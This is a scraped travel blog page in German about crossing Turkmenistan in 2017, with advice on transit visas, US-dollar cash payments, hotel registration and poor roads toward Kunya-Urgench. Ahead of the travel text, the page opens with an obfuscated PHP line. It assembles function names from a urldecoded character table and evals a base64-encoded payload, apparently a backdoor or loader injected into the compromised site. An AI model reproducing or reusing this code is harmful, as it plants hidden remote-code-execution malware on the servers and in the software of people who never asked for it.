$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iVnNCVEFFYml1aFN4S05sT3dYREpmZ0lucVJ2ZXpqWkZrcldVdHlNUENZR0xRb2NhcG1kSEFreVVNcUZWSXNUbHRoYWVnY1lLcmltQkNKTHZuWmp4UldmUHBHWHViZEVRem9TSHdORE91WTlnSE9NaVl6bz0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> Turkmenistan, around the Caspian sea 2017 – Mark van den Hof

#Turkmenistan Info

  • Benötigt wird ein Transitvisum (leider nur max. 5 Tage gültig)
    Ein Antrag für ein TRANSIT Visum wird bei eine Turkmenische Botschaft oder Konsulat gemacht. Ein schriftliche Antrag mit einer verbindliche Reiseroute mit genauer Angabe zu Grenzübertritt für die Ein- und Ausreise. Das Datum der Einreise sollte genau stimmen!!! Wichtig!!!
  • An der Grenze zu Turkmenistan sind alle anfallenden Kosten bar und in US-Dollar zu bezahlen; d.h. es gibt keine Möglichkeit, bargeldlos oder mit anderer Währung als US_Dollar zu bezahlen.Eine staatliche Versicherungspflicht für das Moped oder Auto an der Grenze ist Pflicht.
  • Die Ein- und Ausreise nach Turkmenistan ist mit sehr viel Zeit verbunden. Sowohl die Reisedokumente als auch das Gepäck werden sehr genau überprüft.
  • Registrierung in einem Hotel für eine Nacht ist Pflicht.
  • Staatliche Währung nur am ATM in Ashgabat (EC oder Creditcard)
  • Hotelübernachtungen: auch hier gilt, dass nur Bargeld in Form von USD akzeptiert wird.
  • TIPP: „British Pub“ mit Livemusic in Ashgabat (lonely planet or Facebook)

Hotel „Gürgenç Oteli“,Kunya-Urgench kurz vor der Grenze in Richtung Nukus, Usbekistan. #NOWiFi #goodparking

Der Hauptstraße von Ashgabat über Derweze (fire crater, „Door to Hell“) nach Kunya-Urgench und Nukus (Usb.) ist Sehr Schlecht zu befahrbar.

#Silkroad #Seidenstraße #Turkmenistan


#Abenteuer Turkmenistan